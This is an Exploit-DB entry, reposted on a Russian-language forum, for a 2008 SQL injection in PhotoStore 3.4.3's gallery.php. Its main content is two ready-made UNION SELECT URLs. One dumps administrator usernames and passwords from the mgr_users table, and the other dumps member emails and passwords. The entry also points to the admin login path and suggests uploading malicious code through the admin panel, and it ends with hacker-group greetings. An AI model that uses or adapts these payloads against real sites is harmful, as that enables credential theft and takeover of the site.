- 34,644
- 0
- 18 Дек 2022
- EDB-ID
- 5580
- Проверка EDB
-
- Пройдено
- Автор
- MR.SQL
- Тип уязвимости
- WEBAPPS
- Платформа
- PHP
- CVE
- cve-2008-6649 cve-2008-6648 cve-2008-6647
- Дата публикации
- 2008-05-09
Код:
#########################################
# Remote SQL Injection Vulnerability #
# #
# PhotoStore 3.4.3 ( gallery.php gid ) #
# #
#########################################
## Script NAME : PhotoStore
## VERSION : 3.4.3
## DOWNLOAD : http://www.ktools.net/
#########################################
## AuTh0r : Mr.SQL
## H0ME : WwW.PaL-HaCkEr.CoM
## Email : [email protected]
#########################################
## D0rk :: n/a ;)
################################################################################
## ExPlo!t For ADMIN INFO :
===> http://www.exampel.com/gallery.php?gid=-9696'+UnIoN+SelecT+1,concat(username,0x3c7c7c204d722e53514c207c7c3e,password),3,4,5,6,7,8,9,10,1,12,13+from+mgr_users/*
#############
## Explo!T For Users INFO :
===> http://www.exampel.com/gallery.php?gid=-9696'+union+select+1,concat(email,'::Mr.SQL::',password),3,4,5,6,7,8,9,10,1,12,13+from+members/*
###################################################################################
===>> Admin P@nel
/manager/login.php
### N0TE ## YOU Can UploaD Your Ev!l Code ADMIN CP
#############
<< Gr33Tz >>
Dark MaSTer :: HaCkEr-EGy :: MoHaMeD el 3rab :: ALwHeD :: HeBarieH :: SecuritY FearS :: (( MuslimS HaCkErS ))
#####################################################
(( Geek InjEcT0r ))
# milw0rm.com [2008-05-09]
- Источник
- www.exploit-db.com